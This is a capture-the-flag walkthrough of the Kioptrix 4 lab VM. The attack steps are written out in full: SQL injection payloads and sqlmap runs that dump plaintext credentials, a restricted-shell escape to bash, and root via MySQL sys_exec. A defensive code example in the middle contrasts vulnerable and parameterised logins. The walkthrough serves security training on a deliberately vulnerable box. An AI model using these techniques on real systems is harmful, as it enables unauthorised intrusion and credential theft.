Kioptrix: Level 1.3 (#4) – Walkthrough

This is the final box of the Kioptrix series. The previous three boxes were simple and enjoyable, but this one is a little harder than the older ones. OK, talk is cheap.

Start by scanning the network with netdiscover.

┌─[[email protected]]─[~/Desktop]
└──> netdiscover
 Currently scanning: 192.168.20.0/16   |   Screen View: Unique Hosts                              
                                                                                                  
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                  
 _____________________________________________________________________________ 
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.1.1     60:e3:27:be:75:78      1      60  TP-LINK TECHNOLOGIES CO.,LTD.                  
 192.168.1.70    08:00:27:c8:67:ee      1      60  PCS Systemtechnik GmbH                         
 192.168.1.100   34:97:f6:c3:0b:66      1      60  ASUSTek COMPUTER INC.

The target IP is 192.168.1.70 (the VirtualBox NIC). As usual, scan the target with nmap using version detection.

┌─[✗]─[[email protected]]─[~/Desktop]
└──> nmap -sV 192.168.1.70

Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-08 09:33 +0630
Nmap scan report for 192.168.1.70
Host is up (0.00024s latency).
Not shown: 566 closed ports, 430 filtered ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
MAC Address: 08:00:27:C8:67:EE (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.17 seconds

Let me check HTTP first and brute-force directories with dirb.

┌─[✗]─[[email protected]]─[~/Desktop]
└──> dirb http://192.168.1.70 -r

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon Jan  8 09:34:46 2018
URL_BASE: http://192.168.1.70/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.1.70/ ----
+ http://192.168.1.70/cgi-bin/ (CODE:403|SIZE:327)                                                                   
==> DIRECTORY: http://192.168.1.70/images/                                                                           
+ http://192.168.1.70/index (CODE:200|SIZE:1255)                                                                     
+ http://192.168.1.70/index.php (CODE:200|SIZE:1255)                                                                 
==> DIRECTORY: http://192.168.1.70/john/                                                                             
+ http://192.168.1.70/logout (CODE:302|SIZE:0)                                                                       
+ http://192.168.1.70/member (CODE:302|SIZE:220)                                                                     
+ http://192.168.1.70/server-status (CODE:403|SIZE:332)                                                              
                                                                                                                     
-----------------
END_TIME: Mon Jan  8 09:34:48 2018
DOWNLOADED: 4612 - FOUND: 6

The index page is a login form, so I try a SQL login bypass.

With username admin and a single quote (') as the password, the page shows a MySQL error, so the login query is vulnerable to SQL injection.

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/checklogin.php on line 28
Wrong Username or Password

Now run sqlmap to pull the data out of the database, starting with the current database name:

┌─[[email protected]]─[~/Desktop]
└──> sqlmap -u "http://192.168.1.70/checklogin.php" --data="myusername=admin&mypassword=admin&Submit=Login" -p mypassword --current-db
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.1.12#stable}
|_ -| . [.]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 09:39:48

[09:39:50] [INFO] resuming back-end DBMS 'mysql' 
[09:39:50] [INFO] testing connection to the target URL
[09:39:50] [INFO] heuristics detected web page charset 'ascii'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: myusername=jDWI&mypassword=-8663' OR 3851=3851#&Submit=Login

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: myusername=jDWI&mypassword=' OR SLEEP(5)-- tKEJ&Submit=Login
---
[09:39:50] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.12
[09:39:50] [INFO] fetching current database
[09:39:50] [INFO] resumed: members
current database:    'members'
[09:39:50] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.1.70'

[*] shutting down at 09:39:50

List the tables in the members database:

┌─[[email protected]]─[~/Desktop]
└──> sqlmap -u "http://192.168.1.70/checklogin.php" --data="myusername=admin&mypassword=admin&Submit=Login" -p mypassword --tables -D members
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.1.12#stable}
|_ -| . [']     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[*] starting at 09:40:40

[09:40:40] [INFO] resuming back-end DBMS 'mysql' 
[09:40:40] [INFO] testing connection to the target URL
[09:40:40] [INFO] heuristics detected web page charset 'ascii'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: myusername=jDWI&mypassword=-8663' OR 3851=3851#&Submit=Login

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: myusername=jDWI&mypassword=' OR SLEEP(5)-- tKEJ&Submit=Login
---
[09:40:40] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.12
[09:40:40] [INFO] fetching tables for database: 'members'
[09:40:40] [INFO] fetching number of tables for database 'members'
[09:40:40] [INFO] resumed: 1
[09:40:40] [INFO] resumed: members
Database: members
[1 table]
+---------+
| members |
+---------+

[09:40:40] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.1.70'

[*] shutting down at 09:40:40

List the columns of the members table:

┌─[[email protected]]─[~/Desktop]
└──> sqlmap -u "http://192.168.1.70/checklogin.php" --data="myusername=admin&mypassword=admin&Submit=Login" -p mypassword --columns -T members -D members
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.1.12#stable}
|_ -| . ["]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[*] starting at 09:41:41

[09:41:42] [INFO] resuming back-end DBMS 'mysql' 
[09:41:42] [INFO] testing connection to the target URL
[09:41:42] [INFO] heuristics detected web page charset 'ascii'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: myusername=jDWI&mypassword=-8663' OR 3851=3851#&Submit=Login

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: myusername=jDWI&mypassword=' OR SLEEP(5)-- tKEJ&Submit=Login
---
[09:41:42] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.12
[09:41:42] [INFO] fetching columns for table 'members' in database 'members'
[09:41:42] [INFO] resumed: 3
[09:41:42] [INFO] resumed: id
[09:41:42] [INFO] resumed: int(4)
[09:41:42] [INFO] resumed: username
[09:41:42] [INFO] resumed: varchar(65)
[09:41:42] [INFO] resumed: password
[09:41:42] [INFO] resumed: varchar(65)
Database: members
Table: members
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(4)      |
| password | varchar(65) |
| username | varchar(65) |
+----------+-------------+

[09:41:42] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.1.70'

[*] shutting down at 09:41:42

Finally, dump the username and password columns:

┌─[[email protected]]─[~/Desktop]
└──> sqlmap -u "http://192.168.1.70/checklogin.php" --data="myusername=admin&mypassword=admin&Submit=Login" -p mypassword --dump -C username,password -T members -D members
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.1.12#stable}
|_ -| . [)]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[*] starting at 09:42:24

[09:42:24] [INFO] resuming back-end DBMS 'mysql' 
[09:42:24] [INFO] testing connection to the target URL
[09:42:24] [INFO] heuristics detected web page charset 'ascii'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: myusername=jDWI&mypassword=-8663' OR 3851=3851#&Submit=Login

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: myusername=jDWI&mypassword=' OR SLEEP(5)-- tKEJ&Submit=Login
---
[09:42:24] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.12
[09:42:24] [INFO] fetching entries of column(s) 'password, username' for table 'members' in database 'members'
[09:42:24] [INFO] fetching number of column(s) 'password, username' entries for table 'members' in database 'members'
[09:42:24] [INFO] resumed: 2
[09:42:24] [INFO] resumed: ADGAdsafdfwt4gadfga==
[09:42:24] [INFO] resumed: robert
[09:42:24] [INFO] resumed: MyNameIsJohn
[09:42:24] [INFO] resumed: john
Database: members
Table: members
[2 entries]
+----------+-----------------------+
| username | password              |
+----------+-----------------------+
| robert   | ADGAdsafdfwt4gadfga== |
| john     | MyNameIsJohn          |
+----------+-----------------------+
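To make the two findings above concrete from the defender's side (the injectable login query, and passwords stored in plaintext), here is an added example, not the box's own code, that models the login check in Python against an in-memory SQLite table shaped like the members table sqlmap enumerated. The vulnerable version splices input into the query text (the query shape is assumed, since only the first six lines of checklogin.php appear later in the walkthrough); the hardened version uses a parameterised lookup and salted PBKDF2 hashes. The sample rows are constructed, and the payload uses SQLite's `--` comment where sqlmap's payload used MySQL's `#`.

```python
import hashlib
import hmac
import os
import sqlite3

# Constructed sample credentials; not the rows dumped from the box.
SAMPLE_USERS = [("robert", "sample-pass-1"), ("john", "sample-pass-2")]
# sqlmap's boolean payload used MySQL's '#' comment; SQLite only knows '--'.
BYPASS_PAYLOAD = "' OR 3851=3851 -- "
ITERATIONS = 100_000


def _fresh_db(rows):
    # Same table layout sqlmap enumerated: members(id, username, password).
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE members (id INTEGER PRIMARY KEY, "
                "username TEXT, password TEXT)")
    con.executemany("INSERT INTO members (username, password) VALUES (?, ?)", rows)
    return con

def build_vulnerable_db():
    """Plaintext passwords, as the dump above showed."""
    return _fresh_db(SAMPLE_USERS)

def vulnerable_login(con, username, password):
    """Assumed query shape of checklogin.php: input spliced into the SQL text."""
    sql = ("SELECT * FROM members WHERE username='%s' and password='%s'"
           % (username, password))
    try:
        rows = con.execute(sql).fetchall()
    except sqlite3.OperationalError:
        return "error"  # the PHP page leaked a mysql_num_rows() warning here
    return "granted" if rows else "denied"

def hash_password(password, salt=None):
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt.hex() + "$" + digest.hex()

def verify_password(stored, password):
    salt_hex, digest_hex = stored.split("$", 1)
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                    bytes.fromhex(salt_hex), ITERATIONS)
    return hmac.compare_digest(candidate.hex(), digest_hex)

def build_hardened_db():
    """Salted PBKDF2 hashes instead of plaintext."""
    return _fresh_db([(u, hash_password(p)) for u, p in SAMPLE_USERS])

def safe_login(con, username, password):
    """Parameterised lookup by username; the password never touches SQL text."""
    row = con.execute("SELECT password FROM members WHERE username = ?",
                      (username,)).fetchone()
    if row is None:
        return "denied"
    return "granted" if verify_password(row[0], password) else "denied"

if __name__ == "__main__":
    vuln, hard = build_vulnerable_db(), build_hardened_db()
    print(vulnerable_login(vuln, "admin", "'"), vulnerable_login(vuln, "admin", BYPASS_PAYLOAD))
    print(safe_login(hard, "admin", BYPASS_PAYLOAD), safe_login(hard, "robert", "sample-pass-1"))
```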

We already noticed that SSH is open, so try logging in with these credentials. Keep every recovered password handy; reusing them at each login saves time on the way to the flag.

└──> ssh robert@192.168.1.70
robert@192.168.1.70's password: 
Permission denied, please try again.
robert@192.168.1.70's password: 
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  don't screw up
Type '?' or 'help' to get the list of allowed commands
robert:~$ ls -al
total 24
drwxr-xr-x 2 robert robert 4096 2012-02-04 18:53 .
drwxr-xr-x 5 root   root   4096 2012-02-04 18:05 ..
-rw-r--r-- 1 robert robert  220 2012-02-04 18:05 .bash_logout
-rw-r--r-- 1 robert robert 2940 2012-02-04 18:05 .bashrc
-rw-r--r-- 1 robert robert    5 2012-02-04 18:59 .lhistory
-rw-r--r-- 1 robert robert  586 2012-02-04 18:05 .profile
robert:~$ cat /etc/passwd
*** unknown command: cat
robert:~$ 

The login succeeds, but the restricted shell (lshell) blocks most commands, so I try to break out of it with echo os.system('/bin/bash').

robert:~$ echo os.system('/bin/bash')
robert@Kioptrix4:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
mysql:x:104:108:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
loneferret:x:1000:1000:loneferret,,,:/home/loneferret:/bin/bash
john:x:1001:1001:,,,:/home/john:/bin/kshell
robert:x:1002:1002:,,,:/home/robert:/bin/kshell

Yes, it works. Awesome 😉. A small fix makes the terminal behave properly:

robert@Kioptrix4:/$ clear
'xterm-256color': unknown terminal type.
robert@Kioptrix4:/$ export TERM=xterm
robert@Kioptrix4:/var/www$ ls -al
total 44
drwxr-xr-x  5 root root 4096 2018-01-07 21:55 .
drwxr-xr-x 14 root root 4096 2012-02-04 09:57 ..
-rw-r--r--  1 root root 1477 2012-02-06 11:31 checklogin.php
-rw-r--r--  1 root root  298 2012-02-04 11:11 database.sql
drwxr-xr-x  2 root root 4096 2012-02-06 11:44 images
-rw-r--r--  1 root root 1255 2012-02-06 12:07 index.php
drwxr-xr-x  2 root root 4096 2012-02-04 18:33 john
-rw-r--r--  1 root root  176 2012-02-04 12:39 login_success.php
-rw-r--r--  1 root root   78 2012-02-04 11:33 logout.php
-rw-r--r--  1 root root  606 2012-02-06 15:42 member.php
drwxr-xr-x  2 root root 4096 2012-02-04 18:30 robert
robert@Kioptrix4:/var/www$ cat checklogin.php | head -n 6
<?php
ob_start();
$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password
$db_name="members"; // Database name

Now I know that the MySQL root user has an empty password. At this step I tried a kernel exploit to get root, but gcc is not installed, so let's try another method: look for processes running as root.

robert@Kioptrix4:/var/www$ ps -ef | grep root
root         1     0  0 21:58 ?        00:00:00 /sbin/init
root         2     0  0 21:58 ?        00:00:00 [kthreadd]
root         3     2  0 21:58 ?        00:00:00 [migration/0]
root         4     2  0 21:58 ?        00:00:00 [ksoftirqd/0]
root         5     2  0 21:58 ?        00:00:00 [watchdog/0]
root         6     2  0 21:58 ?        00:00:00 [events/0]
root         7     2  0 21:58 ?        00:00:00 [khelper]
root        41     2  0 21:58 ?        00:00:00 [kblockd/0]
root        44     2  0 21:58 ?        00:00:00 [kacpid]
root        45     2  0 21:58 ?        00:00:00 [kacpi_notify]
root        90     2  0 21:58 ?        00:00:00 [kseriod]
root       129     2  0 21:58 ?        00:00:00 [pdflush]
root       130     2  0 21:58 ?        00:00:00 [pdflush]
root       131     2  0 21:58 ?        00:00:00 [kswapd0]
root       173     2  0 21:58 ?        00:00:00 [aio/0]
root      1265     2  0 21:58 ?        00:00:00 [ata/0]
root      1268     2  0 21:58 ?        00:00:00 [ata_aux]
root      1277     2  0 21:58 ?        00:00:00 [scsi_eh_0]
root      1280     2  0 21:58 ?        00:00:00 [scsi_eh_1]
root      1299     2  0 21:58 ?        00:00:00 [ksuspend_usbd]
root      1306     2  0 21:58 ?        00:00:00 [khubd]
root      2026     2  0 21:58 ?        00:00:00 [scsi_eh_2]
root      2238     2  0 21:58 ?        00:00:00 [kjournald]
root      2405     1  0 21:58 ?        00:00:00 /sbin/udevd --daemon
root      2654     2  0 21:58 ?        00:00:00 [kpsmoused]
root      3927     1  0 21:58 tty4     00:00:00 /sbin/getty 38400 tty4
root      3928     1  0 21:58 tty5     00:00:00 /sbin/getty 38400 tty5
root      3932     1  0 21:58 tty2     00:00:00 /sbin/getty 38400 tty2
root      3934     1  0 21:58 tty3     00:00:00 /sbin/getty 38400 tty3
root      3937     1  0 21:58 tty6     00:00:00 /sbin/getty 38400 tty6
root      3995     1  0 21:58 ?        00:00:00 /bin/dd bs 1 if /proc/kmsg of /var/run/klogd/kmsg
root      4016     1  0 21:58 ?        00:00:00 /usr/sbin/sshd
root      4072     1  0 21:58 ?        00:00:00 /bin/sh /usr/bin/mysqld_safe
root      4114  4072  0 21:58 ?        00:00:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=root -
root      4116  4072  0 21:58 ?        00:00:00 logger -p daemon.err -t mysqld_safe -i -t mysqld
root      4189     1  0 21:58 ?        00:00:00 /usr/sbin/nmbd -D
root      4191     1  0 21:58 ?        00:00:00 /usr/sbin/smbd -D
root      4205  4191  0 21:58 ?        00:00:00 /usr/sbin/smbd -D
root      4206     1  0 21:58 ?        00:00:00 /usr/sbin/winbindd
root      4219  4206  0 21:58 ?        00:00:00 /usr/sbin/winbindd
root      4238     1  0 21:58 ?        00:00:00 /usr/sbin/cron
root      4260     1  0 21:58 ?        00:00:00 /usr/sbin/apache2 -k start
root      4317     1  0 21:58 tty1     00:00:00 /sbin/getty 38400 tty1
root      4390  4016  0 22:22 ?        00:00:00 sshd: robert [priv]
robert    4445  4395  0 22:29 pts/0    00:00:00 grep root

Yes: mysqld is running as root.

root      4114  4072  0 21:58 ?        00:00:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=root -

OK, try logging in to MySQL.

robert@Kioptrix4:/var/www$ mysql -h localhost -u root -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 16
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema | 
| members            | 
| mysql              | 
+--------------------+
3 rows in set (0.00 sec)

mysql> 

It works. I searched Google for how to get root from MySQL and found a nice trick:

https://thehackernews.com/2016/11/mysql-zero-day-exploits.html

MySQL can also execute shell commands through the sys_exec UDF, and because mysqld runs as root, so do those commands. I use it to add my current account to the admin group, which on this Ubuntu release grants sudo rights.

select sys_exec('usermod -a -G admin robert');

Got root! A nice trick. Finally, the proof: read the flag file.

root@Kioptrix4:/var/www# cd /root/
root@Kioptrix4:~# ls -al
total 44
drwxr-xr-x  4 root       root       4096 2012-02-06 18:46 .
drwxr-xr-x 21 root       root       4096 2012-02-06 18:41 ..
-rw-------  1 root       root        254 2018-01-07 21:56 .bash_history
-rw-r--r--  1 root       root       2227 2007-10-20 07:51 .bashrc
-rw-r--r--  1 root       root        625 2012-02-06 10:48 congrats.txt
-rw-r--r--  1 root       root          1 2012-02-05 10:38 .lhistory
drwxr-xr-x  8 loneferret loneferret 4096 2012-02-04 17:01 lshell-0.9.12
-rw-------  1 root       root          1 2012-02-05 10:38 .mysql_history
-rw-------  1 root       root          5 2012-02-06 18:38 .nano_history
-rw-r--r--  1 root       root        141 2007-10-20 07:51 .profile
drwx------  2 root       root       4096 2012-02-06 11:43 .ssh
root@Kioptrix4:~# cat congrats.txt 
Congratulations!
You've got root.

There is more then one way to get root on this system. Try and find them.
I've only tested two (2) methods, but it doesn't mean there aren't more.
As always there's an easy way, and a not so easy way to pop this box.
Look for other methods to get root privileges other than running an exploit.

It took a while to make this. For one it's not as easy as it may look, and
also work and family life are my priorities. Hobbies are low on my list.
Really hope you enjoyed this one.

If you haven't already, check out the other VMs available on:
www.kioptrix.com

Thanks for playing,
loneferret

root@Kioptrix4:~# 

Thanks for reading. Happy hacking.